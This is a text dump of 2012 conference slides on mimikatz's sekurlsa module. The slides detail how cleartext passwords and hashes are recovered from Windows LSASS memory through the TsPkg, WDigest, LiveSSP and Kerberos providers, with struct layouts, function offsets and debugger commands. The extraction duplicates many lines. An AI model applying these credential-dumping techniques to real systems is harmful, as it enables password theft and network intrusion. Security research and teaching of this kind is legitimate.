ASFWS 2012 - Mimikatz par Benjamin Delpy
-
Upload
application-security-forum-western-switzerland -
Category
Technology
-
view
1.681 -
download
7
description
Transcript of ASFWS 2012 - Mimikatz par Benjamin Delpy
mimikatz mimikatz
Benjamin DELPY `gentilkiwi` focus on sekurlsapass-the-pass
and crypto patches
Benjamin DELPY `gentilkiwi` focus on sekurlsapass-the-pass
and crypto patches
Who Why Who Why
Benjamin DELPY `gentilkiwi` ndash French ndash 26y ndash Kiwi addict ndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usage ndash Hack with class
Benjamin DELPY `gentilkiwi` ndash French ndash 26y ndash Kiwi addict ndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usage ndash Hack with class
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 2 2
mimikatz working
mimikatz working
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3 3
sekurlsadll
mimikatzexe
mimikatzexe
KeyIso laquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLog laquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
mimikatzexe
SamSS laquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipe Write a welcome message Wait commandshellip and return results
mimikatz architecture of sekurlsa amp crypto
mimikatz architecture of sekurlsa amp crypto
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4 4
mimikatzexe
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo mod_mimikatz_nogpo
mod_mimikatz_divers mod_mimikatz_divers
mod_mimikatz_winmine mod_mimikatz_winmine
mod_mimikatz_impersonate mod_mimikatz_impersonate
mod_mimikatz_inject mod_mimikatz_inject
mod_mimikatz_samdump mod_mimikatz_samdump
mod_mimikatz_standard mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle mod_mimikatz_handle
mod_mimikatz_system mod_mimikatz_system
mod_mimikatz_service mod_mimikatz_service
mod_mimikatz_process mod_mimikatz_process
mod_mimikatz_thread mod_mimikatz_thread
mod_mimikatz_terminalserver mod_mimikatz_terminalserver
mod_mimikatz_privilege mod_mimikatz_privilege
mod_pipe mod_pipe
mod_inject mod_inject
mod_memory mod_memory
mod_parseur mod_parseur
mod_patch mod_patch
mod_hive mod_hive
mod_secacl mod_secacl
mod_privilege mod_privilege
mod_process mod_process
mod_service mod_service
mod_system mod_system
mod_thread mod_thread
mod_ts mod_ts
mod_text mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0 msv_1_0
tspkg tspkg
wdigest wdigest
livessp livessp
kerberos kerberos
kappfreedll kappfreedll
kelloworlddll kelloworlddll
klockdll klockdll
mimikatzsys mimikatzsys
sekurlsadll
sam sam
secrets secrets
msv_1_0 msv_1_0
wdigest wdigest
livessp livessp
kerberos kerberos
tspkg tspkg
mimikatz sekurlsa what is it
mimikatz sekurlsa what is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5 5
mod_mimikatz_sekurlsa
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6 6
LsaSS WinLogon
Authentication Packages msv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
Challenge Response
userdomainpassword
PLAYSKOOL
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7 7
PLAYSKOOL
mimikatz sekurlsa history of laquo pass-the- raquo 12
mimikatz sekurlsa history of laquo pass-the- raquo 12
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8 8
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
